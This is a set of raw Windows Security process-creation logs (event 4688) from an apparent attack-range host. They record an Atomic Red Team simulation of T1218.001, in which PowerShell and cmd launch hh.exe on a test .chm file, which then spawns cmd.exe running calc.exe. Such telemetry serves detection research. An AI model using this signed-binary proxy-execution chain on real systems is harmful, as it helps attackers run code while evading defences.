Windows security auditing. Type=Information RecordNumber=1748270 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1650 New Process Name: C:\Windows\hh.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x102c Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: hh.exe C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.chm Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:05:43 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748268 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x102c New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1174 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "cmd.exe" /c "hh.exe C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.chm" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 04:00:42 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1736870 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1a44 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x107c Creator Process Name: C:\Windows\hh.exe Process Command Line: "C:\Windows\System32\cmd.exe" /c calc.exe Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 04:00:42 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1736869 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x107c New Process Name: C:\Windows\hh.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x17b0 Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: hh.exe C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.chm Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 04:00:42 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1736867 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x17b0 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1174 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "cmd.exe" /c "hh.exe C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.chm" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.